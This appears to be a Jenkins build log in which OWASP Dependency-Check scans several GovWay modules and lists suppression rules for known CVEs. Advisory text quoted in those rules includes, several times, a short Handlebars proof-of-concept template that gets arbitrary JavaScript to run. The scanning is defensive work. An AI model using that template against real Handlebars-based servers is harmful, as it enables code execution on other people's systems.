Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:41:45 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:41:45 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:41:45 [INFO] Analysis Complete (1 seconds) 17:41:45 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:41:45 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:41:45 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:41:45 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:41:45 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:41:45 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:41:45 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:41:45 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:41:45 [INFO] 17:41:45 [INFO] --------------< org.openspcoop2:org.openspcoop2.opensaml >-------------- 17:41:45 [INFO] Building dependencies.opensaml 1.0 [21/67] 17:41:45 [INFO] from mvn/dependencies/opensaml/pom.xml 17:41:45 [INFO] --------------------------------[ pom ]--------------------------------- 17:41:45 [INFO] 17:41:45 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.opensaml --- 17:41:45 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/opensaml (includes = [*.jar], excludes = []) 17:41:45 [INFO] 17:41:45 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.opensaml --- 17:41:45 [INFO] 17:41:45 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.opensaml --- 17:41:46 [INFO] Executing tasks 17:41:51 [INFO] Executed tasks 17:41:51 [INFO] 17:41:51 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.opensaml --- 17:41:51 [INFO] Checking for updates 17:41:51 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:41:51 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:41:51 [INFO] Check for updates complete (67 ms) 17:41:51 [INFO] 17:41:51 17:41:51 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:41:51 17:41:51 17:41:51 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:41:51 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:41:51 17:41:51 17:41:51 [INFO] Analysis Started 17:41:51 [INFO] Finished Archive Analyzer (0 seconds) 17:41:51 [INFO] Finished File Name Analyzer (0 seconds) 17:41:51 [INFO] Finished Jar Analyzer (0 seconds) 17:41:51 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:41:51 [INFO] Finished Hint Analyzer (0 seconds) 17:41:51 [INFO] Finished Version Filter Analyzer (0 seconds) 17:41:52 [INFO] Created CPE Index (1 seconds) 17:41:52 [INFO] Finished CPE Analyzer (1 seconds) 17:41:52 [INFO] Finished False Positive Analyzer (0 seconds) 17:41:52 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:41:52 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:41:52 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:41:52 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:41:52 17:41:52 17:41:52 ## Recommendation 17:41:52 17:41:52 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:41:52 17:41:52 The following template can be used to demonstrate the vulnerability: 17:41:52 ```{{#with "constructor"}} 17:41:52 {{#with split as |a|}} 17:41:52 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:41:52 {{#with (concat (lookup join (slice 0 1)))}} 17:41:52 {{#each (slice 2 3)}} 17:41:52 {{#with (apply 0 a)}} 17:41:52 {{.}} 17:41:52 {{/with}} 17:41:52 {{/each}} 17:41:52 {{/with}} 17:41:52 {{/with}} 17:41:52 {{/with}}``` 17:41:52 17:41:52 17:41:52 ## Recommendation 17:41:52 17:41:52 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:41:52 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:41:52 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:41:52 [INFO] Analysis Complete (1 seconds) 17:41:52 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:41:52 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:41:52 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:41:52 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:41:52 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:41:52 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:41:52 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:41:52 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:41:52 [INFO] 17:41:52 [INFO] ----------------< org.openspcoop2:org.openspcoop2.pdf >----------------- 17:41:52 [INFO] Building dependencies.pdf 1.0 [22/67] 17:41:52 [INFO] from mvn/dependencies/pdf/pom.xml 17:41:52 [INFO] --------------------------------[ pom ]--------------------------------- 17:41:52 [INFO] 17:41:52 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.pdf --- 17:41:52 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/pdf (includes = [*.jar], excludes = []) 17:41:52 [INFO] 17:41:52 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.pdf --- 17:41:52 [INFO] 17:41:52 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.pdf --- 17:41:53 [INFO] Executing tasks 17:41:58 [INFO] Executed tasks 17:41:58 [INFO] 17:41:58 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.pdf --- 17:41:58 [INFO] Checking for updates 17:41:58 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:41:58 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:41:58 [INFO] Check for updates complete (69 ms) 17:41:58 [INFO] 17:41:58 17:41:58 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:41:58 17:41:58 17:41:58 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:41:58 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:41:58 17:41:58 17:41:58 [INFO] Analysis Started 17:41:58 [INFO] Finished Archive Analyzer (0 seconds) 17:41:58 [INFO] Finished File Name Analyzer (0 seconds) 17:41:58 [INFO] Finished Jar Analyzer (0 seconds) 17:41:58 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:41:58 [INFO] Finished Hint Analyzer (0 seconds) 17:41:58 [INFO] Finished Version Filter Analyzer (0 seconds) 17:41:59 [INFO] Created CPE Index (1 seconds) 17:41:59 [INFO] Finished CPE Analyzer (1 seconds) 17:41:59 [INFO] Finished False Positive Analyzer (0 seconds) 17:41:59 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:41:59 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:41:59 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:41:59 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:41:59 17:41:59 17:41:59 ## Recommendation 17:41:59 17:41:59 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:41:59 17:41:59 The following template can be used to demonstrate the vulnerability: 17:41:59 ```{{#with "constructor"}} 17:41:59 {{#with split as |a|}} 17:41:59 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:41:59 {{#with (concat (lookup join (slice 0 1)))}} 17:41:59 {{#each (slice 2 3)}} 17:41:59 {{#with (apply 0 a)}} 17:41:59 {{.}} 17:41:59 {{/with}} 17:41:59 {{/each}} 17:41:59 {{/with}} 17:41:59 {{/with}} 17:41:59 {{/with}}``` 17:41:59 17:41:59 17:41:59 ## Recommendation 17:41:59 17:41:59 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:41:59 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:41:59 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:41:59 [INFO] Analysis Complete (1 seconds) 17:41:59 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:41:59 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:41:59 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:42:00 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:42:00 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:42:00 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:42:00 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:42:00 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:42:00 [INFO] 17:42:00 [INFO] ---------------< org.openspcoop2:org.openspcoop2.redis >---------------- 17:42:00 [INFO] Building dependencies.redis 1.0 [23/67] 17:42:00 [INFO] from mvn/dependencies/redis/pom.xml 17:42:00 [INFO] --------------------------------[ pom ]--------------------------------- 17:42:00 [INFO] 17:42:00 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.redis --- 17:42:00 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/redis (includes = [*.jar], excludes = []) 17:42:00 [INFO] 17:42:00 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.redis --- 17:42:00 [INFO] 17:42:00 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.redis --- 17:42:00 [INFO] Executing tasks 17:42:05 [INFO] Executed tasks 17:42:05 [INFO] 17:42:05 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.redis --- 17:42:05 [INFO] Checking for updates 17:42:05 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:42:05 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:42:05 [INFO] Check for updates complete (69 ms) 17:42:05 [INFO] 17:42:05 17:42:05 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:42:05 17:42:05 17:42:05 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:42:05 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:42:05 17:42:05 17:42:05 [INFO] Analysis Started 17:42:05 [INFO] Finished Archive Analyzer (0 seconds) 17:42:05 [INFO] Finished File Name Analyzer (0 seconds) 17:42:05 [INFO] Finished Jar Analyzer (0 seconds) 17:42:05 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:42:05 [INFO] Finished Hint Analyzer (0 seconds) 17:42:05 [INFO] Finished Version Filter Analyzer (0 seconds) 17:42:06 [INFO] Created CPE Index (1 seconds) 17:42:07 [INFO] Finished CPE Analyzer (1 seconds) 17:42:07 [INFO] Finished False Positive Analyzer (0 seconds) 17:42:07 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:42:07 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:42:07 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:42:07 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:42:07 17:42:07 17:42:07 ## Recommendation 17:42:07 17:42:07 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:42:07 17:42:07 The following template can be used to demonstrate the vulnerability: 17:42:07 ```{{#with "constructor"}} 17:42:07 {{#with split as |a|}} 17:42:07 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:42:07 {{#with (concat (lookup join (slice 0 1)))}} 17:42:07 {{#each (slice 2 3)}} 17:42:07 {{#with (apply 0 a)}} 17:42:07 {{.}} 17:42:07 {{/with}} 17:42:07 {{/each}} 17:42:07 {{/with}} 17:42:07 {{/with}} 17:42:07 {{/with}}``` 17:42:07 17:42:07 17:42:07 ## Recommendation 17:42:07 